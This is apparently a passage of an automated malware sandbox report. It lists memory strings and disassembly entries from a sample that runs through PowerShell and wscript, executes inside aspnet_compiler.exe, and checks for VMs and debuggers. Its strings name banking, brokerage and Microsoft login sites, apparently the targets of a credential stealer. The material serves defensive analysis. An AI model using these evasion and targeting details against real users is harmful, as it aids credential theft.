                      Source: 6311_I4d42.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: 6311_I4d42.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: 6311_I4d42.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: 6311_I4d42.16.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: powershell.exe, 00000003.00000002.1549427459.00000000087E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1549378330.0000000008700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wscript.exe, 00000007.00000002.1527903385.0000000004E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 6311_I4d42.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: powershell.exe, 00000003.00000002.1549427459.00000000087F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\u
                      Source: 6311_I4d42.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: 6311_I4d42.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: 6311_I4d42.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: powershell.exe, 00000008.00000002.1785136353.000000000791D000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.0000000003010000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.2413870104.00000286094AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 6311_I4d42.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: 6311_I4d42.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: 6311_I4d42.16.drBinary or memory string: tasks.office.comVMware20,11696494690o
                      Source: 6311_I4d42.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: wscript.exe, 00000007.00000002.1527903385.0000000004E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 6311_I4d42.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: 6311_I4d42.16.drBinary or memory string: dev.azure.comVMware20,11696494690j
                      Source: 6311_I4d42.16.drBinary or memory string: global block list test formVMware20,11696494690
                      Source: 6311_I4d42.16.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: 6311_I4d42.16.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: 6311_I4d42.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: powershell.exe, 00000003.00000002.1549427459.00000000087C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
                      Source: 6311_I4d42.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: 6311_I4d42.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: 6311_I4d42.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: powershell.exe, 00000003.00000002.1547598476.00000000077F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 6311_I4d42.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: 6311_I4d42.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C096E rdtsc 12_2_017C096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00417DB3 LdrLoadDll,12_2_00417DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F172 mov eax, dword ptr fs:[00000030h]12_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183C188 mov eax, dword ptr fs:[00000030h]12_2_0183C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183C188 mov eax, dword ptr fs:[00000030h]12_2_0183C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180019F mov eax, dword ptr fs:[00000030h]12_2_0180019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180019F mov eax, dword ptr fs:[00000030h]12_2_0180019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180019F mov eax, dword ptr fs:[00000030h]12_2_0180019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180019F mov eax, dword ptr fs:[00000030h]12_2_0180019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C156 mov eax, dword ptr fs:[00000030h]12_2_0177C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018311A4 mov eax, dword ptr fs:[00000030h]12_2_018311A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018311A4 mov eax, dword ptr fs:[00000030h]12_2_018311A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018311A4 mov eax, dword ptr fs:[00000030h]12_2_018311A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018311A4 mov eax, dword ptr fs:[00000030h]12_2_018311A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01787152 mov eax, dword ptr fs:[00000030h]12_2_01787152
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01786154 mov eax, dword ptr fs:[00000030h]12_2_01786154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01786154 mov eax, dword ptr fs:[00000030h]12_2_01786154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779148 mov eax, dword ptr fs:[00000030h]12_2_01779148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779148 mov eax, dword ptr fs:[00000030h]12_2_01779148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779148 mov eax, dword ptr fs:[00000030h]12_2_01779148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779148 mov eax, dword ptr fs:[00000030h]12_2_01779148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B136 mov eax, dword ptr fs:[00000030h]12_2_0177B136
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B136 mov eax, dword ptr fs:[00000030h]12_2_0177B136
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B136 mov eax, dword ptr fs:[00000030h]12_2_0177B136
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B136 mov eax, dword ptr fs:[00000030h]12_2_0177B136
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018461C3 mov eax, dword ptr fs:[00000030h]12_2_018461C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018461C3 mov eax, dword ptr fs:[00000030h]12_2_018461C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01781131 mov eax, dword ptr fs:[00000030h]12_2_01781131
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01781131 mov eax, dword ptr fs:[00000030h]12_2_01781131
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018551CB mov eax, dword ptr fs:[00000030h]12_2_018551CB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B0124 mov eax, dword ptr fs:[00000030h]12_2_017B0124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018561E5 mov eax, dword ptr fs:[00000030h]12_2_018561E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B01F8 mov eax, dword ptr fs:[00000030h]12_2_017B01F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01840115 mov eax, dword ptr fs:[00000030h]12_2_01840115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A51EF mov eax, dword ptr fs:[00000030h]12_2_017A51EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017851ED mov eax, dword ptr fs:[00000030h]12_2_017851ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov ecx, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov eax, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov eax, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A118 mov eax, dword ptr fs:[00000030h]12_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BD1D0 mov eax, dword ptr fs:[00000030h]12_2_017BD1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BD1D0 mov ecx, dword ptr fs:[00000030h]12_2_017BD1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov ecx, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01814144 mov eax, dword ptr fs:[00000030h]12_2_01814144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179B1B0 mov eax, dword ptr fs:[00000030h]12_2_0179B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855152 mov eax, dword ptr fs:[00000030h]12_2_01855152
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A197 mov eax, dword ptr fs:[00000030h]12_2_0177A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A197 mov eax, dword ptr fs:[00000030h]12_2_0177A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A197 mov eax, dword ptr fs:[00000030h]12_2_0177A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01819179 mov eax, dword ptr fs:[00000030h]12_2_01819179
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C0185 mov eax, dword ptr fs:[00000030h]12_2_017C0185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov ecx, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791070 mov eax, dword ptr fs:[00000030h]12_2_01791070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AC073 mov eax, dword ptr fs:[00000030h]12_2_017AC073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01782050 mov eax, dword ptr fs:[00000030h]12_2_01782050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB052 mov eax, dword ptr fs:[00000030h]12_2_017AB052
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018460B8 mov eax, dword ptr fs:[00000030h]12_2_018460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018460B8 mov ecx, dword ptr fs:[00000030h]12_2_018460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A020 mov eax, dword ptr fs:[00000030h]12_2_0177A020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C020 mov eax, dword ptr fs:[00000030h]12_2_0177C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018550D9 mov eax, dword ptr fs:[00000030h]12_2_018550D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018020DE mov eax, dword ptr fs:[00000030h]12_2_018020DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E016 mov eax, dword ptr fs:[00000030h]12_2_0179E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C0F0 mov eax, dword ptr fs:[00000030h]12_2_0177C0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C20F0 mov ecx, dword ptr fs:[00000030h]12_2_017C20F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017880E9 mov eax, dword ptr fs:[00000030h]12_2_017880E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A0E3 mov ecx, dword ptr fs:[00000030h]12_2_0177A0E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A50E4 mov eax, dword ptr fs:[00000030h]12_2_017A50E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A50E4 mov ecx, dword ptr fs:[00000030h]12_2_017A50E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A90DB mov eax, dword ptr fs:[00000030h]12_2_017A90DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov ecx, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C0 mov eax, dword ptr fs:[00000030h]12_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184903E mov eax, dword ptr fs:[00000030h]12_2_0184903E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182705E mov ebx, dword ptr fs:[00000030h]12_2_0182705E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182705E mov eax, dword ptr fs:[00000030h]12_2_0182705E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855060 mov eax, dword ptr fs:[00000030h]12_2_01855060
